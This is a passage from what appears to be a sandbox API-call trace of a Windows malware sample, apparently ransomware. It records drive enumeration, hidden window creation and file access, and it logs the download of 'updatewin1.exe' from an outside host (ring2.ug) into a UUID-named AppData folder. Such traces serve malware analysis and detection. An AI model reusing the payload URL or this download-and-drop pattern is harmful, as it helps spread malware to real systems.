hTemplateFile=0x0) returned 0x5e0 [0076.768] GetFileType (hFile=0x5e0) returned 0x1 [0076.768] GetLastError () returned 0x0 [0076.786] WriteFile (in: hFile=0x5e0, lpBuffer=0x18c898*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x18c1c4, lpOverlapped=0x0 | out: lpBuffer=0x18c898*, lpNumberOfBytesWritten=0x18c1c4*=0x2a, lpOverlapped=0x0) returned 1 [0076.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3360990 | out: hHeap=0x630000) returned 1 [0076.864] CloseHandle (hObject=0x5e0) returned 1 [0076.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x70f8c0 | out: hHeap=0x630000) returned 1 [0076.940] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.940] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0076.940] RegisterClassExW (param_1=0x18dea0) returned 0xc16d [0076.941] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x60132 [0076.942] NtdllDefWindowProc_W () returned 0x0 [0076.942] NtdllDefWindowProc_W () returned 0x1 [0076.945] NtdllDefWindowProc_W () returned 0x0 [0077.170] NtdllDefWindowProc_W () returned 0x0 [0077.171] ShowWindow (hWnd=0x60132, nCmdShow=0) returned 0 [0077.171] UpdateWindow (hWnd=0x60132) returned 1 [0077.171] GetLogicalDrives () returned 0x4 [0077.171] SetErrorMode (uMode=0x1) returned 0x0 [0077.172] PathFileExistsA (pszPath="C:\\") returned 1 [0077.173] SetErrorMode (uMode=0x0) returned 0x1 [0077.173] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0077.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x806) returned 0x32d2180 [0077.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18de58, cbMultiByte=-1, lpWideCharStr=0x32d2180, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0077.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x3360990 [0077.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2180 | out: hHeap=0x630000) returned 1 [0077.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad2e0 [0077.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3360990 | out: hHeap=0x630000) returned 1 [0077.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2e0 | out: hHeap=0x630000) returned 1 [0077.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad2e0 [0077.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x33211a8 [0077.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8ec) returned 0x32d2180 [0077.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x3360990 [0077.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b3ef40 [0077.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1060) returned 0x335c8a0 [0077.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x70f8c0 [0077.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x335d908 [0077.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x660) returned 0x9b4d880 [0077.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b4df00 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b4e788 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b4f010 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b4f898 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b50120 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x33611a8 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b509a8 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b51230 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b5dee8 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x9b5e730 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x9b5ef98 [0077.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b51ab8 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b52340 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b5f800 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b60048 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b52bc8 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b53450 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b53cd8 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b54560 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b54de8 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b55670 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b55ef8 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b56780 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b57008 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b57890 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x9b60890 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x9b610f8 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b58118 [0077.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b589a0 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b59228 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b61960 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b621a8 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b59ab0 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b5a338 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b5abc0 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b5b448 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b5bcd0 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b5c558 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b5cde0 [0077.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b62a08 [0077.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b63290 [0077.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x9b729f0 [0077.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x9b73258 [0077.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b63b18 [0077.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b643a0 [0077.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b64c28 [0077.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b73ac0 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b654b0 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b65d38 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b665c0 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b66e48 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b676d0 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b67f58 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b687e0 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b69068 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b698f0 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b6a178 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x9b74308 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x9b74b70 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b6aa00 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b6b288 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b6bb10 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b6c398 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b6cc20 [0077.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b6d4a8 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b6dd30 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b6e5b8 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b6ee40 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x32f2a18 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b6f6c8 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b753d8 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b75bf0 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b6ff50 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b707d8 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b71060 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b718e8 [0077.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b76420 [0077.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x70f788 [0077.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b76ca8 [0077.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b77530 [0077.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b77db8 [0077.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78640 [0077.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x110) returned 0x32d0ca0 [0077.252] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x32d2188, dwCreationFlags=0x0, lpThreadId=0x33211b0 | out: lpThreadId=0x33211b0*=0x42c) returned 0x3b0 [0077.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x2a8) returned 0x694 [0077.254] GetMessageW (lpMsg=0x18e050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0097.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.461] GetComputerNameW (in: lpBuffer=0x32faf28, nSize=0x18d3cc | out: lpBuffer="XDUWTFONO", nSize=0x18d3cc) returned 1 [0097.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.461] IsWindow (hWnd=0x60132) returned 1 [0097.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 Thread: id = 33 os_tid = 0xaa4 Thread: id = 34 os_tid = 0x920 Thread: id = 35 os_tid = 0x7e0 Thread: id = 36 os_tid = 0xb70 Thread: id = 37 os_tid = 0x4f4 Thread: id = 38 os_tid = 0x174 Thread: id = 39 os_tid = 0x770 Thread: id = 40 os_tid = 0x408 Thread: id = 41 os_tid = 0x36c [0073.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x110) returned 0x32b75c0 [0073.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x110) returned 0x3298d18 [0073.762] GetLastError () returned 0x54f [0073.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3bc) returned 0x32cf9a0 [0073.762] GetCurrentThreadId () returned 0x36c [0073.763] SetLastError (dwErrCode=0x54f) [0073.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0073.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x656838 [0073.763] GetLastError () returned 0x54f [0073.763] SetLastError (dwErrCode=0x54f) [0073.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f70 [0073.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0073.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x656838 | out: hHeap=0x630000) returned 1 [0073.763] GetLastError () returned 0x54f [0073.763] SetLastError (dwErrCode=0x54f) [0073.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0073.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x48) returned 0x32f5c88 [0073.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0073.763] GetLastError () returned 0x54f [0073.763] SetLastError (dwErrCode=0x54f) [0073.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0073.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x70f5e8 [0073.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f5c88 | out: hHeap=0x630000) returned 1 [0073.764] GetLastError () returned 0x54f [0073.764] SetLastError (dwErrCode=0x54f) [0073.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0073.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e268 [0073.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x70f5e8 | out: hHeap=0x630000) returned 1 [0073.764] GetLastError () returned 0x54f [0073.764] SetLastError (dwErrCode=0x54f) [0073.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0073.764] GetLastError () returned 0x54f [0073.764] SetLastError (dwErrCode=0x54f) [0073.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0073.764] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0073.765] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0073.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x400) returned 0x32cfd68 [0073.765] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x32cfd68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0073.766] UuidCreate (in: Uuid=0x9b2d768 | out: Uuid=0x9b2d768) returned 0x0 [0073.769] UuidToStringA (in: Uuid=0x9b2d768, StringUuid=0x9b2d6c0 | out: StringUuid=0x9b2d6c0) returned 0x0 [0073.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0073.769] RpcStringFreeA (in: String=0x9b2d6c0 | out: String=0x9b2d6c0) returned 0x0 [0073.770] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="cc96d4d5-77d7-41f6-9d0f-85ea800861b4" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4") returned 1 [0073.770] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4"), lpSecurityAttributes=0x0) returned 1 [0073.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x410) returned 0x32d0170 [0073.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x410) returned 0x32d0588 [0073.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1000) returned 0x32d09a0 [0073.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32d0588, cbMultiByte=-1, lpWideCharStr=0x32d09a0, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4") returned 81 [0073.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1010) returned 0x32d19a8 [0073.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d09a0 | out: hHeap=0x630000) returned 1 [0073.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0588 | out: hHeap=0x630000) returned 1 [0073.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad2e0 [0073.776] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0073.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5fb8 [0073.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0588 [0073.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32d5fb8, cbMultiByte=-1, lpWideCharStr=0x32d0588, cchWideChar=1072 | out: lpWideCharStr="http://ring2.ug/files/penelop/updatewin1.exe") returned 45 [0073.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x32d0df0 [0073.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0588 | out: hHeap=0x630000) returned 1 [0073.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5fb8 | out: hHeap=0x630000) returned 1 [0073.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x32d29c0 [0073.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x32d0588 [0073.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x32d0588, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0073.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x32d3238 [0073.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0588 | out: hHeap=0x630000) returned 1 [0073.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d29c0 | out: hHeap=0x630000) returned 1 [0073.787] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring2.ug/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0074.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d3238 | out: hHeap=0x630000) returned 1 [0074.457] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9b2d6d0, lpdwBufferLength=0x9b2d710, lpdwIndex=0x0 | out: lpBuffer=0x9b2d6d0*, lpdwBufferLength=0x9b2d710*=0x4, lpdwIndex=0x0) returned 1 [0074.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6168 [0074.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x32d7b88 [0074.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d6168 | out: hHeap=0x630000) returned 1 [0074.458] lstrcpyA (in: lpString1=0x32cfd68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4" [0074.458] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4", pMore="updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe") returned 1 [0074.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32cdb20 [0074.459] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ec [0074.459] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.459] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.490] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.492] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.525] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.534] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.534] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.572] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.572] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.573] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.575] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.577] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0074.577] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0074.597] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, 